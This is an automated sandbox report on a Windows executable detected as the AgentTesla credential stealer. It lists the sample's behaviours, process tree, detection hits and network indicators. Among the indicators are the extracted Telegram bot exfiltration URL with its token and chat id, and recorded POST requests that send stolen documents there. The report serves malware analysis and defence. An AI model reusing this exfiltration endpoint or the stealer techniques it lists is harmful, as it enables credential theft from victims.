
Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 830902
MD5: 2ddec3a033a6ded2ec135bb2f3ec897d
SHA1: cb40f86b808c7b7812fff7820dc596d3a78e5760
SHA256: bb4297e1d60fbf0c9670f3a436d3c00993307ccf5bbf9bade4a6ebcb608edd6c
Tags: NET, exe, MSIL

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 5124 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 4584 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • file.exe (PID: 3508 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • file.exe (PID: 6116 cmdline: C:\Users\user\Desktop\file.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • Qasvjoldkyh.exe (PID: 4840 cmdline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 4904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Qasvjoldkyh.exe (PID: 388 cmdline: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • kDPmkTm.exe (PID: 964 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
    • powershell.exe (PID: 5604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kDPmkTm.exe (PID: 1496 cmdline: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • Qasvjoldkyh.exe (PID: 4608 cmdline: "C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • kDPmkTm.exe (PID: 3584 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: 2DDEC3A033A6DED2EC135BB2F3EC897D)
  • cleanup
{"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Yara matches (memory dumps)

Source | Rule | Description | Author
00000013.00000002.616219501.00000000034BC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000004.00000002.618527573.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
Process Memory Space: file.exe PID: 6116 | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Process Memory Space: file.exe PID: 6116 | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security

Yara matches (unpacked PE files)

Source | Rule | Description | Author
0.2.file.exe.5710000.4.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
0.3.file.exe.41b5d50.2.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

No Sigma rule has matched

Snort IDS alerts

Timestamp: 03/20/23-19:39:50.282462
Source IP: 192.168.2.4
Destination IP: 149.154.167.220
SID: 2851779
Source Port: 49702
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/20/23-19:38:26.620974
Source IP: 192.168.2.4
Destination IP: 149.154.167.220
SID: 2851779
Source Port: 49698
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: file.exe | ReversingLabs: Detection: 35%
Source: file.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | ReversingLabs: Detection: 35%
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | Joe Sandbox ML: detected
Source: 15.2.Qasvjoldkyh.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
Source: file.exe.6116.4.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49697 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49698 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.237.62.211:443 -> 192.168.2.4:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2
Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb | source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 | source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp

Networking

Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49698 -> 149.154.167.220:443
Source: Traffic | Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49702 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org (2 identical entries)
Source: C:\Users\user\Desktop\file.exe | DNS query: name: api.ipify.org (6 identical entries)
Source: C:\Users\user\AppData\Roaming\Uwztwjweuc\Qasvjoldkyh.exe | DNS query: name: api.ipify.org (6 identical entries)
Source: unknown | DNS query: name: api.ipify.org (6 identical entries)
Source: Yara match | File source: 0.2.file.exe.5710000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.41b5d50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.390593122.0000000005710000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8db29b545d5b5a8 | Host: api.telegram.org | Content-Length: 972 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1 | Content-Type: multipart/form-data; boundary=---------------------------8db298ba02c5c53 | Host: api.telegram.org | Content-Length: 972 | Expect: 100-continue | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.237.62.211
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 | Host: api.ipify.org | Connection: Keep-Alive
Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown | Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.ipify.org
Source: file.exe, 00000004.00000002.618527573.0000000002CF6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000013.00000002.616219501.00000000034D6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: Qasvjoldkyh.exe, 0000000F.00000002.574894643.0000000002C40000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api4.ipify.org
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCert
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
Source: file.exe, 00000004.00000003.396945802.00000000010A5000.00000004.00000020.00020000.00000000.sdmp, Qasvjoldkyh.exe, 0000000F.00000002.566195369.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCert
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.603231673.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.592591106.0000000004BAF000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.640909685.00000000044AF000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
Source: file.exe, 00000000.00000002.392570206.0000000005DE0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.373488964.0000000003E51000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000003.506380534.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.0000000002782000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
Source: kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: file.exe, 00000000.00000002.385810798.0000000002DC4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000005.00000002.528261836.00000000027BC000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000008.00000002.586095089.00000000036B4000.00000004.00000800.00020000.00000000.sdmp, Qasvjoldkyh.exe, 00000009.00000002.571009557.00000000034F4000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000C.00000002.614878151.0000000002DF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
